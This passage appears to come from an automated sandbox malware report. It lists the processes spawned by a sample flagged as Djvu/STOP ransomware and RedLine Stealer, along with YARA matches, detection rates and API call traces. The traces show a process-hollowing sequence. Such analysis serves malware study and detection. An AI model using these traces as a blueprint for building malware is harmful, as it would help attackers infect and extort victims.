              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000005.00000002.1261436866.00000000023E0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1261344737.000000000233F000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:6
              Start time:12:21:06
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.1282127310.00000000022FE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000006.00000002.1282193755.0000000002390000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Antivirus matches:
              • Detection: 100%, Joe Sandbox ML
              • Detection: 71%, ReversingLabs
              Reputation:low
              Has exited:true

              Target ID:7
              Start time:12:21:06
              Start date:02/09/2024
              Path:C:\Users\user\Desktop\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:true
              Has administrator privileges:true
              Programmed in:C, C++ or other language
              Reputation:low
              Has exited:true

              Target ID:12
              Start time:12:21:08
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000000C.00000002.2488460103.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:false

              Target ID:20
              Start time:12:21:17
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000014.00000002.1380517656.0000000002181000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000014.00000002.1380613748.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:21
              Start time:12:21:18
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000015.00000002.1393524836.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:24
              Start time:14:17:52
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000018.00000002.1506412476.00000000022EA000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:25
              Start time:14:17:54
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000019.00000002.1522339744.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:28
              Start time:14:18:04
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000001C.00000002.1624704973.000000000228E000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001C.00000002.1624809590.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001C.00000002.1624809590.0000000002320000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:29
              Start time:14:18:05
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:"C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 0000001D.00000002.1635910279.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Target ID:32
              Start time:14:19:27
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000020.00000002.2444319207.0000000002332000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
              Reputation:low
              Has exited:true

              Target ID:33
              Start time:14:19:27
              Start date:02/09/2024
              Path:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe
              Wow64 process (32bit):true
              Commandline:C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task
              Imagebase:0x400000
              File size:831'488 bytes
              MD5 hash:7972B08246E568495D9D116FC2D0B159
              Has elevated privileges:false
              Has administrator privileges:false
              Programmed in:C, C++ or other language
              Yara matches:
              • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
              • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
              • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: 00000021.00000002.2454668093.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
              Reputation:low
              Has exited:true

              Reset < >

                Execution Graph

                Execution Coverage:1.4%
                Dynamic/Decrypted Code Coverage:94.9%
                Signature Coverage:47.8%
                Total number of Nodes:136
                Total number of Limit Nodes:22
                execution_graph 38168 2360000 38171 2360630 38168->38171 38170 2360005 38172 236064c 38171->38172 38174 2361577 38172->38174 38177 23605b0 38174->38177 38180 23605dc 38177->38180 38178 23605e2 GetFileAttributesA 38178->38180 38179 236061e 38180->38178 38180->38179 38182 2360420 38180->38182 38183 23604f3 38182->38183 38184 23604ff CreateWindowExA 38183->38184 38185 23604fa 38183->38185 38184->38185 38186 2360540 PostMessageA 38184->38186 38185->38180 38187 236055f 38186->38187 38187->38185 38189 2360110 VirtualAlloc GetModuleFileNameA 38187->38189 38190 2360414 38189->38190 38191 236017d CreateProcessA 38189->38191 38190->38187 38191->38190 38193 236025f VirtualFree VirtualAlloc Wow64GetThreadContext 38191->38193 38193->38190 38194 23602a9 ReadProcessMemory 38193->38194 38195 23602e5 VirtualAllocEx NtWriteVirtualMemory 38194->38195 38196 23602d5 NtUnmapViewOfSection 38194->38196 38197 236033b 38195->38197 38196->38195 38198 2360350 NtWriteVirtualMemory 38197->38198 38199 236039d WriteProcessMemory Wow64SetThreadContext ResumeThread 38197->38199 38198->38197 38200 23603fb ExitProcess 38199->38200 38202 22c9026 38203 22c9035 38202->38203 38206 22c97c6 38203->38206 38211 22c97e1 38206->38211 38207 22c97ea CreateToolhelp32Snapshot 38208 22c9806 Module32First 38207->38208 38207->38211 38209 22c903e 38208->38209 38210 22c9815 38208->38210 38213 22c9485 38210->38213 38211->38207 38211->38208 38214 22c94b0 38213->38214 38215 22c94f9 38214->38215 38216 22c94c1 VirtualAlloc 38214->38216 38215->38215 38216->38215 38217 404c3d 38264 406fc0 38217->38264 38219 404c49 GetStartupInfoW 38220 404c5d HeapSetInformation 38219->38220 38222 404c68 38219->38222 38220->38222 38265 40636a HeapCreate 38222->38265 38223 404cb6 38224 404cc1 38223->38224 38291 404c14 66 API calls 3 library calls 38223->38291 38292 405aca 86 API calls 4 library calls 38224->38292 38227 404cc7 38228 404cd3 __RTC_Initialize 38227->38228 38229 404ccb 38227->38229 38266 4076c7 73 API calls __calloc_crt 38228->38266 38293 404c14 66 API calls 3 library calls 38229->38293 38231 404cd2 38231->38228 38233 404ce0 38234 404ce4 38233->38234 38235 404cec GetCommandLineW 38233->38235 38294 404bf6 66 API calls 3 library calls 38234->38294 38267 40766f 68 API calls __malloc_crt 38235->38267 38239 404cfc 38295 4075c1 67 API calls 2 library calls 38239->38295 38241 404d06 38242 404d12 38241->38242 38243 404d0a 38241->38243 38268 40738f 66 API calls 5 library calls 38242->38268 38296 404bf6 66 API calls 3 library calls 38243->38296 38246 404d17 38248 404d23 38246->38248 38249 404d1b 38246->38249 38269 4049d5 77 API calls 4 library calls 38248->38269 38297 404bf6 66 API calls 3 library calls 38249->38297 38253 404d2a 38254 404d2f 38253->38254 38257 404d36 __wwincmdln 38253->38257 38298 404bf6 66 API calls 3 library calls 38254->38298 38256 404d35 38256->38257 38257->38256 38270 403bf0 38257->38270 38260 404d65 38300 404bd8 66 API calls _doexit 38260->38300 38263 404d6a type_info::_Type_info_dtor 38264->38219 38265->38223 38266->38233 38267->38239 38268->38246 38269->38253 38271 4042a8 38270->38271 38272 4042b0 GetConsoleDisplayMode GetSysColor 38271->38272 38273 4042c9 38271->38273 38272->38271 38274 4042d9 GetCalendarInfoA LocalShrink QueryDosDeviceW DrawStateA 38273->38274 38275 40435a 38273->38275 38330 404777 66 API calls 5 library calls 38274->38330 38278 404378 GetCaretPos 38275->38278 38279 40437c SetEndOfFile GetTickCount 38275->38279 38281 404393 38275->38281 38277 40432b 38331 4046fd 66 API calls 2 library calls 38277->38331 38278->38279 38279->38275 38279->38281 38301 403900 38281->38301 38282 404335 38332 404737 66 API calls 2 library calls 38282->38332 38284 4043a4 38287 4043bc GetCurrentDirectoryW 38284->38287 38289 4043cb 38284->38289 38286 404341 38333 4045e0 68 API calls 4 library calls 38286->38333 38287->38284 38289->38260 38299 404bac 66 API calls _doexit 38289->38299 38290 404355 38290->38275 38291->38224 38292->38227 38293->38231 38295->38241 38299->38260 38300->38263 38304 40390d 38301->38304 38302 40391e SetLastError GetCurrentProcess 38303 403930 GetCharWidthFloatA GetBitmapBits GetCharWidth32A 38302->38303 38302->38304 38303->38304 38304->38302 38305 403965 38304->38305 38306 403a04 GlobalAlloc VirtualProtect 38305->38306 38307 403975 6 API calls 38305->38307 38308 403a50 LoadMenuW CharUpperW GetTickCount 38306->38308 38309 4039d5 38307->38309 38308->38308 38310 403a63 38308->38310 38342 404581 66 API calls _free 38309->38342 38311 403ad4 38310->38311 38314 403a99 GetDiskFreeSpaceExA SetConsoleCP LoadLibraryW PeekConsoleInputA WaitForDebugEvent 38310->38314 38315 403af2 LCMapStringW SetEnvironmentVariableW OpenEventA 38311->38315 38318 403b23 38311->38318 38313 4039dd 38343 404908 79 API calls __wcstoi64 38313->38343 38314->38310 38315->38311 38317 4039e4 38344 40454c 77 API calls __mbstrnlen_l 38317->38344 38334 4035e0 38318->38334 38320 403b28 38322 403b30 SetLastError 38320->38322 38324 403b58 38320->38324 38322->38320 38323 4039fa 38345 404bac 66 API calls _doexit 38323->38345 38326 403b7d 6 API calls 38324->38326 38327 403bc3 InterlockedCompareExchange 38324->38327 38328 403bd6 LoadLibraryA 38324->38328 38326->38324 38327->38324 38329 403be7 38328->38329 38329->38284 38330->38277 38331->38282 38332->38286 38333->38290 38339 4035ea _memset 38334->38339 38335 4038e9 38335->38320 38336 403642 11 API calls 38336->38339 38337 40378f 8 API calls 38337->38339 38338 403852 ReadConsoleInputW SetVolumeMountPointA 38338->38339 38339->38335 38339->38336 38339->38337 38339->38338 38340 40380a CommConfigDialogW CreateActCtxA EnumCalendarInfoExA GetLocaleInfoA 38339->38340 38341 403892 GetConsoleAliasExesLengthW CreateEventW 38339->38341 38340->38339 38341->38339 38342->38313 38343->38317 38344->38323 38345->38306

                Control-flow Graph

                APIs
                • SetLastError.KERNEL32(00000000), ref: 00403920
                • GetCurrentProcess.KERNEL32 ref: 00403926
                • GetCharWidthFloatA.GDI32(00000000,00000000,00000000,00000000), ref: 00403938
                • GetBitmapBits.GDI32(00000000,00000000,00000000), ref: 00403940
                • GetCharWidth32A.GDI32(00000000,00000000,00000000,00000000), ref: 0040394E
                • GetMenuStringA.USER32(00000000,00000000,00000000,00000000,00000000), ref: 0040397F
                • LoadMenuW.USER32(00000000,00000000), ref: 00403989
                • CreateDCW.GDI32(00000000,00000000,00000000,00000000), ref: 00403997
                • CreateFileMappingW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004039AA
                • EnumResourceNamesA.KERNEL32(00000000,jaxerizulowesecuxod jokuxuvow puzuwi tenovavagizebeda xidejum,00000000,00000000), ref: 004039BB
                • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 004039C7
                • GlobalAlloc.KERNELBASE(00000000,?), ref: 00403A1D
                • VirtualProtect.KERNELBASE(00000000,?,00000040,?), ref: 00403A36
                • LoadMenuW.USER32(00000000,00000000), ref: 00403A54
                • CharUpperW.USER32(00000000), ref: 00403A58
                • GetTickCount.KERNEL32 ref: 00403A5A
                • GetDiskFreeSpaceExA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403AA1
                • SetConsoleCP.KERNEL32(00000000), ref: 00403AA5
                • LoadLibraryW.KERNEL32(00000000), ref: 00403AA9
                • PeekConsoleInputA.KERNEL32(00000000,?,00000000,?), ref: 00403ABB
                • WaitForDebugEvent.KERNEL32(00000000,00000000), ref: 00403AC5
                • LCMapStringW.KERNEL32(00000000,00000000,cav,00000000,?,00000000), ref: 00403B06
                • SetEnvironmentVariableW.KERNEL32(00000000,00000000), ref: 00403B0C
                • OpenEventA.KERNEL32(00000000,00000000,00000000), ref: 00403B14
                • SetLastError.KERNEL32(00000000), ref: 00403B31
                • GetFileAttributesA.KERNEL32(00000000), ref: 00403B7F
                • GetShortPathNameW.KERNEL32(Nizapason,?,00000000), ref: 00403B8F
                • GlobalWire.KERNEL32(00000000), ref: 00403B93
                • GetThreadPriorityBoost.KERNEL32(00000000,00000000), ref: 00403B99
                • SetDefaultCommConfigW.KERNEL32(00000000,00000000,00000000), ref: 00403BA5
                • GetSystemWindowsDirectoryA.KERNEL32(?,00000000), ref: 00403BB4
                • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00403BCB
                • LoadLibraryA.KERNELBASE(msimg32.dll), ref: 00403BDB
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: Load$CharMenu$ConsoleCreateErrorEventExchangeFileGlobalInterlockedLastLibraryString$AllocAttributesBitmapBitsBoostCommCompareConfigCountCurrentDebugDefaultDirectoryDiskEnumEnvironmentFloatFreeInputMappingNameNamesOpenPathPeekPriorityProcessProtectResourceShortSpaceSystemThreadTickUpperVariableVirtualWaitWidthWidth32WindowsWire
                • String ID: Bq $Nizapason$cav$jaxerizulowesecuxod jokuxuvow puzuwi tenovavagizebeda xidejum$msimg32.dll${
                • API String ID: 674057593-1484726657
                • Opcode ID: dbc354f09cd41c6bee0e0047f39ef207380ce46c76c95511c2d14119976b53de
                • Instruction ID: ac32dcd3d69ca1a597d245470bb96842fbd3d1720af05dafb389192bec6efd49
                • Opcode Fuzzy Hash: dbc354f09cd41c6bee0e0047f39ef207380ce46c76c95511c2d14119976b53de
                • Instruction Fuzzy Hash: A981D235A84340BFE710AFA1DD4AF997B78AB44B06F104035F749BB5F1CAB469808B6D

                Control-flow Graph

                APIs
                • GetConsoleDisplayMode.KERNEL32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 004042B2
                • GetSysColor.USER32(00000000), ref: 004042B6
                • GetCalendarInfoA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004042E5
                • LocalShrink.KERNEL32(00000000,00000000), ref: 004042EF
                • QueryDosDeviceW.KERNEL32(wiheli dekehec tuwovinec xipasuvilugafodozuyo,?,00000000), ref: 00404304
                • DrawStateA.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040431E
                • _malloc.LIBCMT ref: 00404326
                • _free.LIBCMT ref: 00404330
                • _calloc.LIBCMT ref: 0040433C
                • __floor_pentium4.LIBCMT ref: 00404350
                • GetCaretPos.USER32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 0040437A
                • SetEndOfFile.KERNEL32(00000000,5A23B70C,4C792A3C,59A467F8,7471B480,3B5F2E36,48B33CD3,20083C10,7471B480,3BDF99AE,0ACBF23F,79236BC7,7BF5D87B,64F98D57,7B811E2C,609402EA), ref: 0040437E
                • GetTickCount.KERNEL32 ref: 00404380
                • GetCurrentDirectoryW.KERNEL32(00000000,?), ref: 004043C6
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1232488988.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1232477992.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232488988.0000000000410000.00000020.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232544034.00000000004A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232558566.00000000004B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1232609303.000000000064A000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_66d5df681876c_file010924.jbxd
                Similarity
                • API ID: CalendarCaretColorConsoleCountCurrentDeviceDirectoryDisplayDrawFileInfoLocalModeQueryShrinkStateTick__floor_pentium4_calloc_free_malloc
                • String ID: ,Sf$6._;$:6Y2$; =Z$<*yL$@9L/$CS?$L+U5$augY$hr_3$jJ,S$s.Y*$wiheli dekehec tuwovinec xipasuvilugafodozuyo$|6A($Hk<
                • API String ID: 924734774-1285194791
                • Opcode ID: 3360a2277858194782dde3c7c085f57b235e4587718fe2da1788c104c9dc8348
                • Instruction ID: 3863aa5b02f7fd0275f4c771cf35735ce8351af34a87748ea64ca48beac1dbbf
                • Opcode Fuzzy Hash: 3360a2277858194782dde3c7c085f57b235e4587718fe2da1788c104c9dc8348
                • Instruction Fuzzy Hash: 0F020FB6609380CFD2748F6AC985B8EF7E0BB85710F50891DEAC95B660DB308885CF57

                Control-flow Graph

                APIs
                • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 02360156
                • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 0236016C
                • CreateProcessA.KERNELBASE(?,00000000), ref: 02360255
                • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 02360270
                • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02360283
                • Wow64GetThreadContext.KERNEL32(00000000,?), ref: 0236029F
                • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023602C8
                • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 023602E3
                • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 02360304
                • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 0236032A
                • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 02360399
                • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 023603BF
                • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 023603E1
                • ResumeThread.KERNELBASE(00000000), ref: 023603ED
                • ExitProcess.KERNEL32(00000000), ref: 02360412
                Memory Dump Source
                • Source File: 00000000.00000002.1232991821.0000000002360000.00000040.00001000.00020000.00000000.sdmp, Offset: 02360000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_2360000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: Virtual$MemoryProcess$AllocThreadWrite$ContextWow64$CreateExitFileFreeModuleNameReadResumeSectionUnmapView
                • String ID:
                • API String ID: 93872480-0
                • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction ID: dc136ec4a4066f4295b0cd8a38f1ba25afc1cfcb5a56d52aeb4997dd1bf4f312
                • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                • Instruction Fuzzy Hash: FCB1C774A00208AFDB44CF98C895FAEBBB5FF88314F248158E549AB395D771AE41CF94

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 113 22c97c6-22c97df 114 22c97e1-22c97e3 113->114 115 22c97ea-22c97f6 CreateToolhelp32Snapshot 114->115 116 22c97e5 114->116 117 22c97f8-22c97fe 115->117 118 22c9806-22c9813 Module32First 115->118 116->115 117->118 123 22c9800-22c9804 117->123 119 22c981c-22c9824 118->119 120 22c9815-22c9816 call 22c9485 118->120 124 22c981b 120->124 123->114 123->118 124->119
                APIs
                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 022C97EE
                • Module32First.KERNEL32(00000000,00000224), ref: 022C980E
                Memory Dump Source
                • Source File: 00000000.00000002.1232942398.00000000022C9000.00000040.00000020.00020000.00000000.sdmp, Offset: 022C9000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_22c9000_66d5df681876c_file010924.jbxd
                Yara matches
                Similarity
                • API ID: CreateFirstModule32SnapshotToolhelp32
                • String ID:
                • API String ID: 3833638111-0
                • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction ID: ec42c34c5e5458ebd64f2352f35d3acce7a7de25e3856d7d74aec3b5987b4e85
                • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                • Instruction Fuzzy Hash: ABF062312107116FD7203BF5A88DBBA76ECAF89729F60072CE646960C4DB70E8854A61

                Control-flow Graph

                • Executed
                • Not Executed
